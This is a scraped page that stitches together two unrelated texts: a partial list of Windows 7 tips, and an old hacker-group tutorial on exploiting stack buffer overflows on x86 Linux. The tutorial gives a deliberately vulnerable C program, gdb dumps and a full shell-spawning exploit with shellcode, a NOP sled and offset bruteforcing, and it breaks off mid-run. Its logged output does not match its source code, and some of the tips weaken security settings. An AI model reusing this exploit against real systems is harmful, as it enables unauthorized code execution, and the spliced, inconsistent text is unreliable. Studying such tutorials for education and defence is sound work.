The first part, "Everything" will be the folder name, and can be whatever you want: "Super Control Panel", "Advanced", "God Mode" if you prefer.

The extension, ED7BA470-8E54-465E-825C-99712043E01C, must be entered exactly as it is here, though, including the curly brackets. When you press [Enter] this part of the name will disappear, and double-clicking the new folder will display shortcuts to functions in the Action Centre, the Network and Sharing Centre, Power options, troubleshooting tools, user accounts and others - more than 260 options in total.


18. Right-click everything

At first glance Windows 7 bears a striking resemblance to Vista, but there's an easy way to begin spotting the differences - just right-click things.

Right-click an empty part of the desktop, for instance, and you'll find a menu entry to set your screen resolution. No need to go browsing through the display settings any more.

Right-click the Explorer icon on the taskbar for speedy access to common system folders: Documents, Pictures, the Windows folder, and more.

And if you don't plan on using Internet Explorer then you probably won't want its icon permanently displayed on the taskbar. Right-click the icon, select 'Unpin this program from the taskbar', then go install Firefox, instead.

19. Display the old taskbar button context menu

Right-click a taskbar button, though, and you'll now see its jumplist menu. That's a useful new feature, but not much help if you want to access the minimize, maximize, or move options that used to be available. Fortunately there's an easy way to get the old context menu back - just hold down Ctrl and Shift as you right-click the taskbar button.

20. Desktop slideshow

Windows 7 comes with some very attractive new wallpapers, and it's not always easy to decide which one you like the best. So why not let choose a few, and let Windows display them all in a desktop slideshow? Right-click an empty part of the desktop, select Personalise > Desktop Background, then hold down Ctrl as you click on the images you like. Choose how often you'd like the images to be changed (anything from daily to once every 10 seconds), select Shuffle if you'd like the backgrounds to appear in a random order, then click Save Changes and enjoy the show.


DESKTOP SLIDESHOW: Select multiple background images and Windows will cycle through them



21. RSS-powered wallpaper

And if a slideshow based on your standard wallpaper isn't enough, then you can always create a theme that extracts images from an RSS feed. For example, Long Zheng has created a few sample themes to illustrate how it works. Jamie Thompson takes this even further, with a theme that always displays the latest BBC news and weather on your desktop. And MakeUseOf have a quick and easy tutorial showing how RSS can get you those gorgeous Bing photographs as your wallpaper. Or you can watch our custom theme video tutorial.

22. Customise the log-on screen

Changing the Windows log-on screen used to involve some complicated and potentially dangerous hacks, but not any more - Windows 7 makes it easy.



First, browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background in REGEDIT, double-click the DWORD key called OEMBackground (not there? Create it) and set its value to 1.



Now find a background image you'd like to use. Make sure it's less than 256KB in size, and matches the aspect ratio of your screen as it'll be stretched to fit.



Next, copy that image into the %windir%\system32\oobe\info\backgrounds folder (create the info\backgrounds folders if they don't exist). Rename the image to backgroundDefault.jpg, reboot, and you should now have a custom log-on image.



Alternatively, use a free tweaking tool to handle everything for you. Logon Changer displays a preview so you can see how the log-on screen will look without rebooting, while the Logon Screen Rotator accepts multiple images and will display a different one every time you log on.

23. Recover screen space

The new Windows 7 taskbar acts as one big quick launch toolbar that can hold whatever program shortcuts you like (just right-click one and select Pin To Taskbar). And that's fine, except it does consume a little more screen real estate than we'd like. Shrink it to a more manageable size by right-clicking the Start orb, then Properties > Taskbar > Use small icons > OK.

24. Enjoy a retro taskbar

Windows 7 now combines taskbar buttons in a way that saves space, but also makes it more difficult to tell at a glance whether an icon represents a running application or a shortcut. If you prefer a more traditional approach, then right-click the taskbar, select Properties, and set Taskbar Buttons to "Combine when taskbar is full". You'll now get a clear and separate button for each running application, making them much easier to identify.

25. Remove taskbar buttons

One problem with the previous tip is the buttons will gobble up valuable taskbar real estate, but you can reduce the impact of this by removing their text captions. Launch REGEDIT, browse to HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics, add a string called MinWidth, set it to 54, and reboot to see the results.

26. Restore the Quick Launch Toolbar

If you're unhappy with the new taskbar, even after shrinking it, then it only takes a moment to restore the old Quick Launch Toolbar.

Right-click the taskbar, choose Toolbars > New Toolbar, type "%UserProfile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch" (less the quotes) into the Folder box and click Select Folder.

Now right-click the taskbar, clear 'Lock the taskbar', and you should see the Quick Launch toolbar, probably to the right. Right-click its divider, clear Show Text and Show Title to minimise the space it takes up. Complete the job by right-clicking the bar and selecting View > Small Icons for the true retro look.

27. Custom power switch

By default, Windows 7 displays a plain text 'Shut down' button on the Start menu, but it only takes a moment to change this action to something else. If you reboot your PC a few times every day then that might make more sense as a default action: right-click the Start orb, select Properties and set the 'Power boot action' to 'Restart' to make it happen.

28. Auto arrange your desktop

If your Windows 7 desktop has icons scattered everywhere then you could right-click it and select View > Auto arrange, just as in Vista. But a simpler solution is just to press and hold down F5, and Windows will automatically arrange its icons for you.

29. Disable smart window arrangement

Windows 7 features interesting new ways to intelligently arrange your windows, so that (for example) if you drag a window to the top of the screen then it will maximise. We like the new system, but if you find it distracting then it's easily disabled. Run REGEDIT, go to HKEY_CURRENT_USER\Control Panel\Desktop, set WindowArrangementActive to 0, reboot, and your windows will behave just as they always did.

30. Browse your tasks

If you prefer the keyboard over the mouse, you will love browsing the taskbar using this nifty shortcut. Press Windows and T, and you move the focus to the left-most icon on the taskbar. Then use your arrow keys to change the focus to other icons, and you get a live preview of every window.

31. Display your drives

Click Computer in Windows 7 and you might see a strange lack of drives, but don't panic, it's just Microsoft trying to be helpful: drives like memory card readers are no longer displayed if they're empty. We think it's an improvement, but if you disagree then it's easy to get your empty drives back. Launch Explorer, click Tools > Folder Options > View and clear 'Hide empty drives in the computer folder'.

32. See more detail

The new and improved Windows 7 magnifier offers a much easier way to zoom in on any area of the screen. Launch it and you can now define a scale factor and docking position, and once activated it can track your keyboard focus around the screen. Press Tab as you move around a dialog box, say, and it'll automatically zoom in on the currently active control.


33. Hiding the Windows Live Messenger icon

If you use Windows Live Messenger a lot, you'll have noticed that the icon now resides on the taskbar, where you can easily change status and quickly send an IM to someone. If you prefer to keep Windows Live Messenger in the system tray, where it's been for previous releases, just close Windows Live Messenger, edit the shortcut properties and set the application to run in Windows Vista compatibility mode.

34. Customise UAC

Windows Vista's User Account Control was a good idea in practice, but poor implementation put many people off - it raised far too many alerts. Fortunately Windows 7 displays less warnings by default, and lets you further fine-tune UAC to suit your preferred balance between security and a pop-up free life (Start > Control Panel > Change User Account Control Settings).

35. Use Sticky Notes

The Sticky Notes app is both simpler and more useful in Windows 7. Launch StikyNot.exe and you can type notes at the keyboard; right-click a note to change its colour; click the + sign on the note title bar to add another note; and click a note and press Alt + 4 to close the note windows (your notes are automatically saved).

36. Open folder in new process

By default Windows 7 opens folders in the same process. This saves system resources, but means one folder crash can bring down the entire shell. If your system seems unstable, or you're doing something in Explorer that regularly seems to causes crashes, then open Computer, hold down Shift, right-click on your drive and select Open in New Process. The folder will now be launched in a separate process, and so a crash is less likely to affect anything else.

37. Watch more videos

Windows Media Player 12 is a powerful program, but it still won't play all the audio and video files you'll find online. Fortunately the first freeware Windows 7 codecs package [shark007.net/win7codecs.html] has been released, and installing it could get your troublesome multimedia files playing again.

38. Preview fonts

Open the Fonts window in Windows XP and Vista and you'll see the font names, probably with icons to tell you whether they're TrueType or OpenType, but that's about it. Windows 7 sees some useful font-related improvements.

Open the new fonts window and you'll find a little preview for every font, giving you a quick idea of how they're going to look.

The tedium of scrolling through multiple entries for each family, like Times New Roman, Times New Roman Bold, Times New Roman Bold Italic and so on, has finally ended. There's now just a single entry for each font (though you can still see all other members of the family).

And there's a new OpenType font, Gabriola, added to the mix. It's an attractive script font, well worth a try the next time you need a stylish document that stands out from the crowd.

39. Restore your gadgets

Windows 7 has tightened up its security by refusing to run gadgets if UAC has been turned off, so limiting the damage malicious unsigned gadgets can do to your system. If you've disabled UAC, miss your gadgets and are happy to accept the security risk, though, there's an easy Registry way to get everything back to normal. Run REGEDIT, go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sidebar\Settings, create a new DWORD value called AllowElevatedProcess and set it to 1. Your gadgets should start working again right away.

40. New WordPad formats

By default WordPad will save documents in Rich Text Format, just as before. But browse the Save As Format list and you'll see you can also save (or open, actually) files in the Office 2007 .docx or OpenDocument .odt formats.

41. Protect your data

USB flash drives are convenient, portable, and very easy to lose. Which is a problem, especially if they're carrying sensitive data. Fortunately Windows 7 has the solution: encrypt your documents with an extension of Microsoft's BitLocker technology, and only someone with the password will be able to access it. Right-click your USB flash drive, select Turn on BitLocker and follow the instructions to protect your private files.




PROTECT YOUR DATA: Your USB flash drives can easily be encrypted with BitLocker

42. Minimise quickly with shake

If you have multiple windows open on your desktop and things are getting too cluttered, it used to be a time-consuming process to close them all down. In Windows 7 you can use the Aero Shake feature to minimise everything in seconds, using a cool mouse gesture. Grab the title bar of the window you wish to keep open and give it a shake, and rejoice in a clear desktop area.

43. Configure your favourite music

The Windows 7 Media Centre now comes with an option to play your favourite music, which by default creates a changing list of songs based on your ratings, how often you play them, and when they were added (it's assumed you'll prefer songs you've added in the last 30 days). If this doesn't work then you can tweak how Media Centre decides what a "favourite" tune is- click Tasks > Settings > Music > Favourite Music and configure the program to suit your needs.

44. Customise System Restore

There was very little you could do to configure System Restore in Vista, but Windows 7 improves the situation with a couple of useful setup options.

Click the Start orb, right-click Computer and select Properties > System Protection > Configure, and set the Max Usage value to a size that suits your needs (larger to hold more restore points, smaller to save disk space).

And if you don't need System Restore to save Windows settings then choose the "Only restore previous versions of files" option. Windows 7 won't back up your Registry, which means you'll squeeze more restore points and file backups into the available disk space. System Restore is much less likely to get an unbootable PC working again, though, so use this trick at your own risk.

45. Run As

Hold down Shift, right-click any program shortcut, and you'll see an option to run the program as a different user, handy if you're logged in to the kids' limited account and need to run something with higher privileges. This isn't really a new feature - Windows XP had a Run As option that did the same thing - but Microsoft stripped it out of Vista, so it's good to see it's had a change of heart.

46. Search privacy

By default Windows 7 will remember your PC search queries, and display the most recent examples when searching in Windows Explorer. If you're sharing a PC and don't want everyone to see your searches, then launch GPEDIT.MSC, go to User Configuration > Administrative Templates > Windows Components > Windows Explorer, double-click "Turn off display of recent search entries..." and click Enabled > OK.

47. Tweak PC volume

By default Windows 7 will now automatically reduce the volume of your PC's sounds whenever it detects you're making or receiving PC-based phone calls. If this proves annoying (or maybe you'd like it to turn off other sounds altogether) then you can easily change the settings accordingly. Just right-click the speaker icon in your taskbar, select Sounds > Communications, and tell Windows what you'd like it to do.

48. Rearrange the system tray

With Windows 7 we finally see system tray icons behave in a similar way to everything else on the taskbar. So if you want to rearrange them, then go right ahead, just drag and drop them into the order you like. You can even move important icons outside of the tray, drop them onto the desktop, then put them back when you no longer need to keep an eye on them.

49. Extend your battery life

Windows 7 includes new power options that will help to improve your notebook's battery life. To see them, click Start, type Power Options and click the Power Options link, then click Change Plan Settings for your current plan and select Change Advanced Settings. Expand Multimedia Settings, for instance, and you'll see a new "playing video" setting that can be set to optimise power savings rather than performance. Browse through the other settings and ensure they're set up to suit your needs.

50. Write crash dump files

Windows 7 won't create memory.dmp crash files if you've less than 25GB of free hard drive space, annoying if you've installed the Windows debugging tools and want to diagnose your crashes. You can turn this feature off, though: browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl, create a new DWORD value called AlwaysKeepMemoryDump, set it to 1, and the crash dump file will now always be saved.


51. Find bottlenecks

From what we've seen so far Windows 7 is already performing better than Vista, but if your PC seems sluggish then it's now much easier to uncover the bottleneck. Click Start, type RESMON and press Enter to launch the Resource Monitor, then click the CPU, Memory, Disk or Network tabs. Windows 7 will immediately show which processes are hogging the most system resources.

The CPU view is particularly useful, and provides something like a more powerful version of Task Manager. If a program has locked up, for example, then right-click its name in the list and select Analyze Process. Windows will then try to tell you why it's hanging - the program might be waiting for another process, perhaps - which could give you the information you need to fix the problem.


FIND BOTTLENECKS: Resource monitor keeps a careful eye on exactly how your PC is being used

52. Keyboard shortcuts

Windows 7 supports several useful new keyboard shortcuts.

Alt+P

Display/ hide the Explorer preview pane

Windows Logo+G

Display gadgets in front of other windows

Windows Logo++ (plus key)

Zoom in, where appropriate

Windows Logo+- (minus key)

Zoom out, where appropriate

Windows Logo+Up

Maximise the current window

Windows Logo+Down

Minimise the current window

Windows Logo+Left

Snap to the left hand side of the screen

Windows Logo+Right

Snap to the right hand side of the screen

Windows Logo+Home

Minimise/ restore everything except the current window

53. Drag and drop to the command line

When working at the command line you'll often need to access files, which usually means typing lengthy paths and hoping you've got them right. But Windows 7 offers an easier way. Simply drag and drop the file onto your command window and the full path will appear, complete with quotes and ready to be used.

This feature isn't entirely new: you could do this in Windows XP, too, but drag and drop support disappeared in Vista. There does seem to be a new Windows 7 complication, though, in that it only seems to work when you open the command prompt as a regular user. Run cmd.exe as an administrator and, while it accepts dropped files, the path doesn't appear.

54. Customise your jumplists

Right-click an icon on your taskbar, perhaps Notepad, and you'll see a jumplist menu that provides easy access to the documents you've been working on recently. But maybe there's another document that you'd like to be always available? Then drag and drop it onto the taskbar icon, and it'll be pinned to the top of the jumplist for easier access. Click the pin to the right of the file name, or right-click it and select "Unpin from this list" when you need to remove it.

55. Faster program launches

If you've launched one instance of a program but want to start another, then don't work your way back through the Start menu. It's much quicker to just hold down Shift and click on the program's icon (or middle-click it), and Windows 7 will start a new instance for you.

56. Speedy video access

Want faster access to your Videos folder? Windows 7 now lets you add it to the Start menu. Just right-click the Start orb, click Properties > Start Menu > Customize, and set the Videos option to "Display as a link". If you've a TV tuner that works with Windows 7 then you'll appreciate the new option to display the Recorded TV folder on the Start menu, too.

57. Run web searches

The Windows 7 search tool can now be easily extended to search online resources, just as long as someone creates an appropriate search connector. To add Flickr support, say, visit I Started Something, click Download the Connector, choose the Open option and watch as it's downloaded (the file is tiny, it'll only take a moment). A "Flickr Search" option will be added to your Searches folder, and you'll be able to search images from your desktop.

A multitude of other ready-made searches, such as Google and YouTube, can be downloaded from the windowsclub.com website.

58. Schedule Media Centre downloads

You can now tell Windows Media Centre to download data at a specific time, perhaps overnight, a useful way to prevent it sapping your bandwidth for the rest of the day. Launch Media Centre, go to Tasks > Settings > General > Automatic Download Options, and set the download start and stop times that you'd like it to use.

59. Multi-threaded Robocopies

Anyone who's ever used the excellent command-line robocopy tool will appreciate the new switches introduced with Windows 7. Our favourite, /MT, can improve speed by carrying out multi-threaded copies with the number of threads you specify (you can have up to 128, though that might be going a little too far). Enter robocopy /? at a command line for the full details.

60. Load IE faster

Some Internet Explorer add-ons can take a while to start, dragging down the browser's performance, but at least IE8 can now point a finger at the worst resource hogs. Click Tools > Manage Add-ons, check the Load Time in the right-hand column, and you'll immediately see which browser extensions are slowing you down.

61. An Alt+Tab alternative

You want to access one of the five Explorer windows you have open, but there are so many other programs running that Alt+Tab makes it hard to pick out what you need. The solution? Hold down the Ctrl key while you click on the Explorer icon. Windows 7 will then cycle through the Explorer windows only, a much quicker way to locate the right one. And of course this works with any application that has multiple windows open.

62. Block annoying alerts

Just like Vista, Windows 7 will display a suitably stern warning if it thinks your antivirus, firewall or other security settings are incorrect.

But unlike Vista, if you disagree then you can now turn off alerts on individual topics. If you no longer want to see warnings just because you've dared to turn off the Windows firewall, say, then click Control Panel > System and Security > Action Centre > Change Action Centre settings, clear the Network Firewall box and click OK.

63. Parallel defrags

The standard Windows 7 defragger offers a little more control than we saw in Vista, and the command line version also has some interesting new features. The /r switch will defrag multiple drives in parallel, for instance (they'll obviously need to be physically separate drives for this to be useful). The /h switch runs the defrag at a higher than normal priority, and the /u switch provides regular progress reports so you can see exactly what's going on. Enter the command

defrag /c /h /u /r

in a command window to speedily defrag a system with multiple drives, or enter defrag /? to view the new options for yourself.

64. Fix Explorer

The Windows 7 Explorer has a couple of potential annoyances. Launching Computer will no longer display system folders like Control Panel or Recycle Bin, for instance. And if you're drilling down through a complicated folder structure in the right-hand pane of Explorer, the left-hand tree won't always expand to follow what you're doing, which can make it more difficult to see exactly where you are. Fortunately there's a quick fix: click Organize > Folder and Search Options, check "Show all folders" and "Automatically expand to current folder", and click OK.

65. Faster file handing

If you hold down Shift while right-clicking a file in Explorer, then you'll find the Send To file now includes all your main user folders: Contacts, Documents, Downloads, Music and more. Choose any of these and your file will be moved there immediately.

66. Create folder favourites

If you're regularly working on the same folder in Explorer then select it in the right-hand page, right-click Favourites on the left-hand menu, and select Add to Favourites. It'll then appear at the bottom of the favourites list for easy one-click access later.

67. Disable hibernation

By default Windows 7 will permanently consume a chunk of your hard drive with its hibernation file, but if you never use sleep, and always turn your PC off, then this will never actually be used. To disable hibernation and recover a little hard drive space, launch REGEDIT, browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Power, then set both HibernateEnabled and HiberFileSizePerfect to zero.

Read More

Exploiting Stack Based Buffer Overflows

SOLDIERX.COM Presents
Exploiting Stack Based Buffer Overflows
By SOLDIERX.COM

NOBODY CAN STOP INFORMATION INSEMINATION
The author hereby grants permission to reproduce, redistribute,
or include this file(s) in your file section, electronic or print
newletter, or any other form of transmission that you choose, as
long as it is kept intact and whole, with no ommissions, delet-
ions, or changes. SOLDIERX.COM - http://www.soldierx.com
E-mail - root@bse.die.ms, Website - http://bse.die.ms/
By The Itch / BsE
---------------------------------------

Lately i encountered more and more articles explaining stack based
buffer overflows, and after reading some, i decided to learn too
how they work.

The stuff i explain in this article are stack based buffer overflows
on the x86 architectures. Ofcourse, a basic knowledge of C is required
and a minimum knowlegde of assembly language also.

I have learned exploitation of stack based buffer overflows from
the articles of Aleph1 and mixter, furthermore WildCoyote was always
willing to answer my questions.

Requirements:
1. intel/x86 machine running a flavor of linux.
2. root on that machine, or enable core dumping (ulimit -c unlimited).
3. pico (or any other text editor).
4. gdb (a very handy debugger).

Best to begin with, are some basic examples in C.

<-------vuln1.c---------------------------
/* Example program
* Its vulnerability is in the use of the strcpy() function
*
* Coded by The Itch / BsE
* root@bse.die.ms
* http://bse.die.ms
*/

#include
#include
#include

int main(int argc, char *argv[])
{
char buffer[30];
if(argc < 2)
{
printf("strcpy() NOT executed....\n");
printf("Syntax: %s \n", argv[0]);
exit(0);
}

strcpy(buffer, argv[1]);
printf("buffer = %s\n", buffer);
printf("strcpy() executed...\n");
return 0;
}

/* Remember, there is no cure for BsE */

<-------vuln1.c---------------------------

The function strcpy() does not check its boundaries, that means
that it doesnt check if argv[1] fits into buffer, and just keeps
on copying into buffer until it encounters a NULL string (\0).

Lets run the program.

[root@daveli whiz]# gcc vuln1.c -o vuln1
[root@daveli whiz]# ./vuln1 1234567890
buffer = 1234567890
strcpy() executed...
[root@daveli whiz]#

No problems yet, because 1234567890 easily fits into a 30 byte buffer.
(1234567890 = only 10 bytes).

The buffer works like this:

[#####################] [ebp] [eip]

[#####################] = the buffer(size)
[ebp] = the stack frame pointer
[eip] = the instruction pointer (the return address)

The Stack Pointer, also known as the ESP registers points to the top
of the stack (wich is dynamical). The bottom of the stack is always
located at a fixed address. The stack grows downwards. Later on i will
explain why the Stack Pointer is intresting for us.

The Stack Frame Pointer. The register EBP is used on intel CPU's to
store the Stack Frame Pointer (sometimes called the Base Pointer).
The first thing a procedure needs to do when its called is saving the
Stack Frame Pointer. After that the Stack Pointer (ESP) will be copied
into the Stack Frame pointer (EBP) and it creates with those values
the new Stack Frame pointer (EBP). The Frame Pointer is used to store
the locations of the local varabiales used in that particular function.

The Instruction Pointer. The Register EIP, also known as the return
address. As soon as the strcpy() function is called, it wil save
the Instruction Pointer(EIP) onto the stack. The saved EIP will
become the return address of the strcpy() function. The Instruction
Pointer points to the next instruction the processor should execute.
(If we can overwrite that one, it is possible to execute our own
code).

[note] Memory works in multiples of 4. In our example program we
define for char buffer[30]; (30 bytes) but, because memory works
in multiples of 4, the memory actually reservers 32 bytes for
char buffer[30];

But lets continue with our program, we defined to buffer 30 bytes,
so lets test it:

[root@daveli whiz]# ./vuln1 123456789012345678901234567890
buffer = 123456789012345678901234567890
strcpy() executed...
[root@daveli whiz]#

Works perfect. But actually there are 32 bytes reservered for buffer,
so lets test it again.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012
buffer = 12345678901234567890123456789012
strcpy() executed...
[root@daveli whiz]#

Look, thats still possible.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012AAAA
buffer = 12345678901234567890123456789012AAAA
strcpy() executed...
Segmentation fault (core dumped)
[root@daveli whiz]#

Ok, that didnt work anymore. I used A because that is in hexadecimal
0x41. (You see 0x41 easier when you debug your program). And i used
4 A's because the memory works in multiples of 4.

Lets examine what exactly happend. According to our above theory, only
the Frame Pointer (EBP) is overwritten, and not yet the EIP register
(the return address, what we really want to overwrite).

[root@daveli whiz]# gdb ./vuln1 core
GNU gdb 19991116 Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `./vuln1 12345678901234567890123456789012AAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x40031902 in __libc_start_main (main=Cannot access memory at address
0x41414149 ) at ../sysdeps/generic/libc-start.c:55 55 ..
sysdeps/generic/libc-start.c: No such file or directory.
(gdb) info registers
eax 0x0 0
ecx 0x40014000 1073823744
edx 0x0 0
ebx 0x400fa120 1074766112
esp 0xbffff9f4 0xbffff9f4
ebp 0x41414141 0x41414141
esi 0x40012eb0 1073819312
edi 0x400ea533 1074701619
eip 0x40031902 0x40031902
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x0 0
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
---Type to continue, or q to quit---
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)

Aha, you can clearly see the register EBP is overwritten with 0x41414141
Good, but what we really want is to get EIP overwritten, so that we
can execute our own code. Lets start our example program one more time,
but we add another 4 A's to the command line.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012AAAAAAAA
buffer = 12345678901234567890123456789012AAAAAAAA
strcpy() executed...
Segmentation fault (core dumped)

Lets start up gdb again.

[root@daveli whiz]# gdb ./vuln1 core
GNU gdb 19991116
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `./vuln1 12345678901234567890123456789012AAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x40014000 1073823744
edx 0x0 0
ebx 0x400fa120 1074766112
esp 0xbffff884 0xbffff884
ebp 0x41414141 0x41414141
esi 0x40012eb0 1073819312
edi 0x400ea533 1074701619
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
---Type to continue, or q to quit---
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)

And look, EIP is also overwritten with 4 A's (0x41414141)
This means that we can jump to any address in the stack.
(given that it is in our process space or else we will get a
segmentation violation).

Now its time to write an exploit!
(to make it a little bit easier, i increase the buffer of our vulnerable
program from 30 bytes to 128 bytes. You should do this also or else
the following instructions will fail. This is because our shellcode is
approxamitly 30 a 40 bytes big. (Else it would be to much trouble
fitting our shellcode into the buffer).

The following exploit code is mainly taken from Aleph1's article,
but this is just general exploit code that is usable in 99% of the
cases. Comments on every line is from me.

<---------expl1.c------------------------------------

/* Exploit for vuln1.c according to my article
* about stack based buffer overflows
*
* The Itch / BsE
* root@bse.die.ms
* http://bse.die.ms
*/

#include
#include

/* Here we define how much bytes off our shellcode is from ESP */
#define DEFAULT_OFFSET 0

/* Here we define how big our buffer must be. The optimal thing to do
* is to use 100 bytes more then the buffer you are trying to overflow.
* This is because this is the total size of our shellcode, nops and
* return address.
*/
#define DEFAULT_BUFFER_SIZE 228

/* NOP means No OPeration, if this code is executed, there wont happen
* anything and the program just continues to execute, later on you will
* see why this is very handy
*/
#define NOP 0x90

/* this function determines the current ESP register */
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}

/* These are assembler instructions to start a shell, we set this code
* into the memory, and overwrite the original return address with the
* return address pointing to this shellcode, so that our shell gets
* started. The only thing that this code does is executing /bin/sh
* (below asm instructions are just a execve() call of /bin/sh)
*/
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
/* define our exploit buffer */
char *buff;

/* define our pointer */
char *ptr;

/* our address pointer, where we will put in our
* return address
*/
long *addr_ptr;

long addr; /* our return address */

/* how many bytes different is our return address from ESP ? */
int offset = DEFAULT_OFFSET;

/* our buffersize */
int bsize = DEFAULT_BUFFER_SIZE;

/* the integer we use for our for loops */
int i;

/* Our start arguments for our exploit can be:
* ./expl1 buffersize offset
* if the exploit is started with ./expl1 buffersize
* then use that buffersize instead of the one that
* we define with #define DEFAULT_BUFFER_SIZE
*/
if(argc > 1) { bsize = atoi(argv[1]); }

/* same as above, but with the offset */
if(argc > 2) { offset = atoi(argv[2]); }

/* check if there is enough available memory for our buffer */
if(!(buff = malloc(bsize)))
{
printf("Unable to allocate memory.\n");
exit(0);
}

/* The return address of our shellcode, calculated by the stack
* pointer minus our offset (because the stack grows downwards, it
* has to be minus). In a lot of cases the current stackpointer is
* also the return address, or it only lies a few bytes of it.
*/
addr = get_sp() - offset;

printf("exploit for vuln1\n\n");
printf("Coded by The Itch / BsE\n");
printf("Using return address: 0x%x\n", addr);
printf("stack pointer: 0x%x\n", get_sp());
printf("Using buffersize: %d\n", bsize);

ptr = buff;
addr_ptr = (long *) ptr;

/* Here we fill our buffer with the return address from our buffer */
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; }

/* After that we fill the first half of our buffer with NOP's */
for(i = 0; i < bsize / 2; i++) { buff[i] = NOP; }

/* Put ptr(the pointer) on the second part of our buffer, and
* reserve length for our shellcode and put half of it in the
* first half of our buffer
*/
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

/* Put our shellcode in the first half of our buffer */
for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; }

/* ending null string for strcpy() (so that it stops with
* copying things from argv[1] into the buffer[])
*/
buff[bsize - 1] = '\0';

/* put in front of buff[] the word EGG= */
memcpy(buff, "EGG=", 4);

/* And place buff after that into the enviroment */
putenv(buff);

/* execute our vulnerable program */
system("./vuln1 $EGG");

return 0;
}

/* Remember, there is no cure for BsE */

<-------expl1.c------------------------------------

What we exactly did is this:

The buffer that we want to overflow is 128 bytes big. (The following
examples are not on scale, because it wouldn't fit in the article).
The shellcode is approxamitly 30 a 40 bytes big (count it out yourself)
so, for our convience, lets say our shellcode is 35 bytes big.

So our number of nops would be: (228/2) - (35/2) = 96 NOPS. After that
there will 35 / 2 bytes of shellcode into it (so 96 + (35/2)).
And after that we will fill out our buffer with the return address, so
we could also define 128+8 bytes as our buffer. (But take not that
in that case there wouldnt be 96 NOPs, but ((128+8)/2) - (35/2) number
of NOP's

But, if you do it that way, you would have less chance to find the
right offset for our return address. So we take a big number of NOP's,
the more chance we find a useable return address. But take note that
you dont take to MUCH NOP's, because you will be risking of overwriting
EIP with either NOP's or your shellcode instead of your return address.


# = original buffer
N = NOP
S = Shellcode
R = return address of our shellcode

The original buffer will look like this:

[##########################################################] [EBP] [EIP]

After our exploit, it will look like this:

[NNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRRRR] [RRR] [RRR]

As you can see, EBP and EIP are overwritten with the return address of
our shellcode and NOP's. We hope that our return address points either
in the NOP's or at beginning of our buffer.

This is also the reason that i use NOP's in my exploit, because if i
wouldnt use NOP's, it would look like this:

Original buffer:

[##########################################################] [EBP] [EIP]

Buffer after our exploit without using NOP's:
[RRRRRRRRRRRRRRRRRRRRRRRRSSSSSSSSSSSSSSSSSSSSSRRRRRRRRRRRRR] [RRR] [RRR]

In this case, we have only one valid return address, and that is the
one of the beginning of the shellcode, if we would start even
one byte less or more, then program that we will try to exploit will
segfault. That is because the return address is a pointer and is not
used for execution.

Well, lets just start testing. Je can, to avoid annoying beeps, just
remove in vuln1.c the part printf("buffer = %s\n", buffer);
and recompile. (This is ofcourse not necassery, but when you will
start bruteforcing offsets, its very handy).

[root@daveli whiz]# gcc vuln1.c -o vuln1
[root@daveli whiz]# gcc expl1.c -o expl1
[root@daveli whiz]# ./expl1
exploit for vuln1
Coded by The Itch / BsE
Using return address: 0xbffff9f4
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
[root@daveli whiz]#

hmm, bad luck, as you can see the stack pointer (ESP) wasnt our exact
return address what we needed. So that will probably come down to
bruteforcing. But let us first just try some combinations.
(ALWAYS try positive and negative offsets!!)

root@daveli whiz]# ./expl1 228 10
exploit voor vuln1 volgens het whizkunde artikel
Coded by The Itch / BsE
Using return address: 0xbffff9f2
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
[root@daveli whiz]#

hmm too bad, nothing again ....

[root@daveli whiz]# ./expl1 228 20
exploit voor vuln1 volgens het whizkunde artikel
Coded by The Itch / BsE
Using return address: 0xbffff9e8
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
[root@daveli whiz]#

